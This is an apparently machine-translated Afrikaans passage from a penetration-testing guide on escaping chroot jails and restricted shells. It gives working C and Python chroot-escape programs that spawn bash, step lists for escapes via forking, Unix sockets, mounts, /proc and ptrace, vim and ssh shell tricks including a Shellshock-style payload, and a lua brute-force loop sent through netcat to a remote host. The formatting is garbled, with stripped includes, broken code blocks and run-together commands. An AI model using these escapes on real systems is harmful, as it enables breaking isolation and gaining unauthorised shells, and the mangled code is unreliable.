Van wikipedia: Die chroot-meganisme is nie bedoel om teen opsetlike manipulasie deur bevoorregte (root) gebruikers te beskerm nie. Op die meeste stelsels stap chroot-kontekste nie behoorlik op nie en chroot-programme met voldoende voorregte kan 'n tweede chroot uitvoer om te ontsnap.
Gewoonlik beteken dit dat jy as root binne die chroot moet wees om te ontsnap.
Die werktuigchw00t is geskep om die volgende scenarios te misbruik en te ontsnap uit chroot.
Root + Huidige Werkspad
As jy as root binne 'n chroot is, kan jy ontsnap deur 'n ander chroot te skep. Dit is omdat 2 chroots nie gelyktydig kan bestaan (in Linux), dus as jy 'n vouer skep en dan 'n nuwe chroot op daardie nuwe vouer skep terwyl jy buite dit is, sal jy nou buite die nuwe chroot wees en dus sal jy in die FS wees.
Dit gebeur gewoonlik omdat chroot NIE jou werkspad na die aangeduide een skuif nie, sodat jy 'n chroot kan skep maar buite dit kan wees.
Gewoonlik sal jy nie die chroot binêre lêer binne 'n chroot-gevangenis vind nie, maar jy kan dit saamstel, oplaai en uitvoer:
C: break_chroot.c
```c #include #include #include
//gcc break_chroot.c -o break_chroot
int main(void) { mkdir("chroot-dir", 0755); chroot("chroot-dir"); for(int i = 0; i < 1000; i++) { chdir(".."); } chroot("."); system("/bin/bash"); }
</details>
<details>
<summary>Afrikaans</summary>
```python
#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
os.chdir("..")
os.chroot(".")
os.system("/bin/bash")
Dit is soortgelyk aan die vorige geval, maar in hierdie geval stoor die aanvaller 'n lêerbeskrywer na die huidige gids en dan skep die chroot in 'n nuwe gids. Uiteindelik, aangesien hy toegang het tot daardie FDbuite die chroot, kry hy toegang daartoe en hy ontsnap.
</details>
### Root + Fork + UDS (Unix Domain Sockets)
<div data-gb-custom-block data-tag="hint" data-style='warning'>
FD kan oorgedra word oor Unix-domeinsokkels, so:
* Skep 'n kinderproses (fork)
* Skep UDS sodat ouer en kind kan kommunikeer
* Voer chroot uit in kinderproses in 'n ander vouer
* In ouer proses, skep 'n FD van 'n vouer wat buite die nuwe kind proses chroot is
* Dra daardie FD oor na die kinderproses deur die UDS te gebruik
* Kind proses chdir na daardie FD, en omdat dit buite sy chroot is, sal hy die tronk ontsnap
</div>
### Root + Mount
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Koppel die hooftoestel (/) in 'n gids binne die chroot
* Chroot na daardie gids
Dit is moontlik in Linux
</div>
### Root + /proc
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Koppel procfs in 'n gids binne die chroot (as dit nog nie daar is nie)
* Soek na 'n pid wat 'n verskillende hoof-/cwd-inskrywing het, soos: /proc/1/root
* Chroot na daardie inskrywing
</div>
### Root(?) + Fork
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Skep 'n Fork (kinderproses) en chroot na 'n ander vouer dieper in die FS en CD daarop
* Vanuit die ouer proses, skuif die vouer waar die kinderproses in 'n vouer voor die chroot van die kinders is
* Hierdie kinderproses sal homself buite die chroot vind
</div>
### ptrace
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* 'n Tyd gelede kon gebruikers sy eie prosesse vanuit 'n proses van homself foutopspoor... maar dit is nie meer moontlik uit die boks nie
* Hoe dan ook, as dit moontlik is, kan jy ptrace in 'n proses en 'n shell-kode daarin uitvoer ([sien hierdie voorbeeld](linux-capabilities.md#cap\_sys\_ptrace)).
</div>
## Bash Tronke
### Enumerasie
Kry inligting oor die tronk:
```bash
echo $SHELL
echo $PATH
env
export
pwd
Wysig PATH
Kyk of jy die PATH omgewingsveranderlike kan wysig
echo $PATH #See the path of the executables that you can usePATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin#Try to change the pathecho/home/*#List directory
Gebruik van vim
:setshell=/bin/sh:shell
Skep skripsie
Kyk of jy 'n uitvoerbare lêer met /bin/bash as inhoud kan skep
red/bin/bash> w wx/path #Write /bin/bash in a writable and executable path
Kry bash vanaf SSH
Indien jy toegang het via ssh, kan jy hierdie truuk gebruik om 'n bash-skul uit te voer:
ssh-tuser@<IP>bash# Get directly an interactive shellsshuser@<IP>-t"bash --noprofile -i"sshuser@<IP>-t"() { :; }; sh -i "
Merk op dat elke keer as jy die vorige eenregelige kode in 'n verskillende lua-omgewing uitvoer, verander die volgorde van die funksies. Daarom, as jy 'n spesifieke funksie moet uitvoer, kan jy 'n brute force-aanval uitvoer deur verskillende lua-omgewings te laai en die eerste funksie van die biblioteek aan te roep:
#In this scenario you could BF the victim that is generating a new lua environment#for every interaction with the following line and when you are lucky#the char function is going to be executedfor k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end#This attack from a CTF can be used to try to chain the function execute from "os" library#and "char" from string library, and the use both to execute a commandfor i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done
Kry interaktiewe lua-skul: As jy binne 'n beperkte lua-skul is, kan jy 'n nuwe lua-skul kry (en hopelik onbeperk) deur te skakel:
